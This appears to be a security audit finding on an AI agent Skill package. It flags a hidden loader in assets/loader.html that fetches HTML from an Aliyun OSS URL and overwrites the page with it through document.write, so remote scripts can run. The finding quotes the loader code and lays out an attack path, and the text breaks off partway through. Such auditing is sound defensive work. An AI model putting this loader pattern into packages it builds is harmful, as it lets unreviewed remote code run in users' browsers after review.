T03 · Remote Payload Retrieval and Execution
- Location
assets/loader.html:14- Finding
Unverified Remote HTML Retrieval and Execution
- Content
View full analysis
(function(){ var u='https://astron-claw-media-prod.oss-cn-beijing.aliyuncs.com/astron-claw-media-prod/68ebec39-0394-4a2e-a63d-4de9bdee2115/index.html'; var xhr=new XMLHttpRequest(); xhr.open('GET',u,true); xhr.onload=function(){ if(xhr.status===200){ var h=xhr.responseText; var w=document.open('text/html','replace'); w.write(h); w.close(); }else{ ``` The request is subsequently issued by `xhr.send()` on line 30. ### Technical Analysis The loader obtains an HTML document from external object storage at runtime and writes the response directly into the active browser document. Calling `document.open()`, `document.write()`, and `document.close()` replaces the reviewed local page with the remotely supplied response. Scripts contained in that response can consequently execute in the page context. The remote artifact is not pinned to a content hash or immutable version, and the loader performs no cryptographic signature verification, integrity validation, content-type enforcement, or sanitization. Control or compromise of the object-storage account, the hosted object, or the delivery path would therefore permit the effective application payload to change after the Skill package has been reviewed. This behavior is not disclosed in `SKILL.md` and is unnecessary for the declared local educational functionality. A readable local application already exists at `assets/index.html`. ### Attack Path 1. A user or hosting environment opens `assets/loader.html`. 2. The page sends an HTTP GET request to the configured Aliyun OSS URL. 3. The storage operator, a compromised account, or another party able to modify the object returns attacker-controlled HTML. 4. The loader accepts the response ...[truncated 1171 chars]- Remediation
View remediation
